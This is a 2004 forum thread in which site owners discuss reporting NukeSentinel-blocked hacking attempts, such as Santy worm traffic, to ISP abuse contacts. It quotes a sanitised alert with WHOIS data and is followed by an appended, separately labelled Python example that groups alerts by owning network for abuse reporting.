Author |
Message |
crypto
Worker
Joined: Aug 02, 2004
Posts: 165
|
Posted:
Sun Dec 26, 2004 1:06 pm |
|
Do you report hacking attempts to abuse@hackers_isp.com if you find out that somebody has tried to hack or mess up your site?
I don't know whether this helps, but I'll forward NukeSentinel alerts to the abuse@ email address. |
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Sun Dec 26, 2004 2:47 pm |
|
I do if it's US based. I have had reasonably good success with AOL, ComCast, and a few others. |
Muffin
Client
Joined: Apr 10, 2004
Posts: 649
Location: UK
|
Posted:
Sun Dec 26, 2004 3:54 pm |
|
I hadn't, but I did think it would be a good idea if it could be written into Sentinel somehow. |
Raven
|
Posted:
Sun Dec 26, 2004 5:12 pm |
|
Somewhere along the line the user has to take accountability ;) |
Muffin
|
Posted:
Sun Dec 26, 2004 6:07 pm |
|
Yeah, we can't rely too much on the experts lol
I'll make sure I email abuse in future then hehhee |
manunkind
Client
Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM
|
Posted:
Mon Dec 27, 2004 10:07 am |
|
I've never done it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far. |
Viper-
New Member
Joined: Dec 24, 2004
Posts: 5
|
Posted:
Mon Dec 27, 2004 10:43 pm |
|
manunkind wrote: | I've never done it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far. |
Would you mind sharing some of the responses you've gotten so far and which ISP responded?
I wouldn't mind having a list of some sort of ISPs that really do take abuse seriously and will actually respond.
Before I implemented Raven's quick fix, I had received over 500 e-mails from Sentinel banning IPs in less than 24 hours. Something like that would be hard to e-mail the various IP owners, but it's something I would do over a period of a week or so.
Thanks,
Viper |
mds
Client
Joined: Dec 24, 2004
Posts: 194
Location: Michigan
|
Posted:
Mon Dec 27, 2004 11:03 pm |
|
Here's one I sent with the info and the reply to what I sent....
*EDITED FOR MY SECURITY* ha ha
Merry Christmas.
Thanks for your feedback. The server in question is owned and managed
by one of our customers. He has had an intruder on the machine or been
attacked by a worm. He has fixed the problem now.
Dag Øien
Domeneshop AS
På 25. des 2004 kl. 03:29 skrev <me@mysite.org>:
> From me@mysite.com Fri Dec 24 17:59:16 2004
>
> X-Apparently-To:
> me@yahoo.com via XXX.XXX.XXX.XXX; Fri, 24 Dec 2004
> 17:58:19 -0800
>
> Authentication-Results:
> XXXXXX.mail.XXX.yahoo.com from=mysite.com;
> domainkeys=neutral (no sig)
>
> X-Originating-IP:
> [XX.XXX.XXX.XXX]
>
> Return-Path:
> <root@hostXX.myhost.com>
>
> Received:
> from XXX.XXX.XXX.XXX (HELO hostXX.myhost.com) (XX.XX.XXX.XXX) by
> mta328.mail.scd.yahoo.com with SMTP; Fri, 24 Dec 2004 17:58:18 -0800
>
> Received:
> (mail XXXX invoked by uid XXXX); 25 Dec 2004 01:59:16 -0000
>
> Delivered-To:
> XXXX-me@mysite.com
>
> Received:
> (mail XXXX invoked by uid XX); 25 Dec 2004 01:59:16 -0000
>
> Date:
> 25 Dec 2004 01:59:16 -0000
>
> Message-ID:
> <XXXXXXXXXX.myhost.com>
>
> To:
> me@mysite.com
>
> Subject:
> Blocked on My site.com
>
> From:
>
>
> X-Mailer:
> NukeSentinel™
>
> Content-Length:
> 797
> Date & Time: 2004-12-24 17:59:15
> Blocked IP: 194.63.250.67
> User ID: (1)
> Reason: Abuse-Script
> --------------------
> User Agent: lwp-trivial/1.41
> Query String:
> www.michigandirtslingers.com/modules.php?
> Forwarded For: none
> Client IP: none
> Remote Address: 194.63.250.67
> Remote Port: 53540
> Request Method: GET
> --------------------
> DNSStuffDNSStuffSorry, you have triggered our rate limiting system.
> Please try again later. If you are reading this in a web browser, we
> apologize -- we want you to use the site as much as you like. What we
> do
> not like is when people use automated programs with our free service.
> We have the addresses uce@ftc.gov and fraud@ftc.gov here in case
> spammers are harvesting addresses from our site. If you are not
> automatically removed within a few minutes, you can contact us (using
> our info@
> address at the domain in the URL you are at; please refer to 43ddeb42)
> to
> get access again more quickly. Thanks!
>
>
> WHOIS results for 194.63.250.67
>
> Generated by www.DNSstuff.com
> Country: EU
>
> ARIN says that this IP belongs to RIPE; I'm looking it up there.
>
>
> Using 0 day old cached answer (or, you can get fresh results).
> Hiding E-mail address (you can get results with the E-mail address).
>
> % This is the RIPE Whois query server #2.
> % The objects are in RPSL format.
> %
> % Rights restricted by copyright.
> % See http://www.ripe.net/db/copyright.html
>
> inetnum: 194.63.248.0 - 194.63.255.255
> netname: NO-HYPNOTECH
> descr: Hypnotech AS
> descr: Local ISP
> country: NO
> admin-c: HH2777-RIPE
> tech-c: HH2777-RIPE
> status: ASSIGNED PI
> notify: ***********@hypnotech.com
> notify: ****@global-ip.net
> mnt-by: RIPE-NCC-HM-PI-MNT
> mnt-by: GLOBALONE-MNT
> changed: **********@ripe.net 19991109
> source: RIPE
>
> route: 194.63.248.0/21
> descr: DOMENESHOP
> origin: AS12996
> notify: **********@domeneshop.no
> mnt-by: AS12996-MNT
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
> role: Domeneshop Hostmaster
> address: Domeneshop AS
> address: Nedre vaskegang 6
> address: NO-0186 Oslo
> address: Norway
> phone: +47 22 94 33 33
> fax-no: +47 22 94 33 34
> e-mail: **********@domeneshop.no
> admin-c: SS784
> tech-c: SS784
> nic-hdl: HH2777-RIPE
> notify: **********@domeneshop.no
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
>
> |
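Viper's point above, that hundreds of per-IP alerts are too many to report one by one, is usually handled by grouping alerts by the network that owns each address so each provider gets one summary. An added example (not part of the thread and not NukeSentinel code) that does this for alert bodies and RPSL `inetnum` records laid out like the ones mds quotes; the sample alerts, addresses and netnames are constructed.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed alerts using the field layout of the quoted alert
# (documentation-range addresses, not real traffic).
ALERTS = [
    "Date & Time: 2004-12-24 17:59:15\nBlocked IP: 192.0.2.67\nReason: Abuse-Script\n",
    "Date & Time: 2004-12-24 18:03:41\nBlocked IP: 192.0.2.90\nReason: Abuse-Script\n",
    "Date & Time: 2004-12-25 02:10:09\nBlocked IP: 198.51.100.7\nReason: Abuse-Script\n",
    "Date & Time: 2004-12-24 09:30:00\nBlocked IP: 192.0.2.67\nReason: Abuse-Script\n",
]
# Constructed RPSL excerpts; the netnames are made up.
WHOIS = [
    "inetnum: 192.0.2.0 - 192.0.2.255\nnetname: EXAMPLE-NET-A\n",
    "inetnum: 198.51.100.0 - 198.51.100.127\nnetname: EXAMPLE-NET-B\n",
]

FIELD = re.compile(r"^[> \t]*([A-Za-z][A-Za-z &-]*?):[ \t]*(.*)$", re.M)

def parse_fields(text):
    """Parse 'Name: value' lines (optionally '>'-quoted) into a dict."""
    return {k.strip(): v.strip() for k, v in FIELD.findall(text)}

def parse_inetnum(text):
    """Return (first_ip, last_ip, netname) from an RPSL inetnum object."""
    f = parse_fields(text)
    lo, hi = (ipaddress.ip_address(p.strip()) for p in f["inetnum"].split("-"))
    return lo, hi, f.get("netname", "UNKNOWN")

def group_by_network(alerts, whois_records):
    """Collapse per-IP alerts into one summary per owning network."""
    ranges = [parse_inetnum(w) for w in whois_records]
    out = defaultdict(lambda: {"ips": set(), "times": [], "reasons": set()})
    for a in map(parse_fields, alerts):
        ip = ipaddress.ip_address(a["Blocked IP"])
        net = next((n for lo, hi, n in ranges
                    if lo.version == ip.version and lo <= ip <= hi), "UNKNOWN")
        out[net]["ips"].add(str(ip))
        out[net]["times"].append(a["Date & Time"])
        out[net]["reasons"].add(a.get("Reason", "?"))
    return {n: {"ips": sorted(d["ips"]), "alerts": len(d["times"]),
                "first": min(d["times"]), "last": max(d["times"]),
                "reasons": sorted(d["reasons"])} for n, d in out.items()}

if __name__ == "__main__":
    for net, summary in group_by_network(ALERTS, WHOIS).items():
        print(net, summary)
```

Addresses that fall outside every supplied range are collected under `UNKNOWN`, which marks the ones that still need a WHOIS lookup.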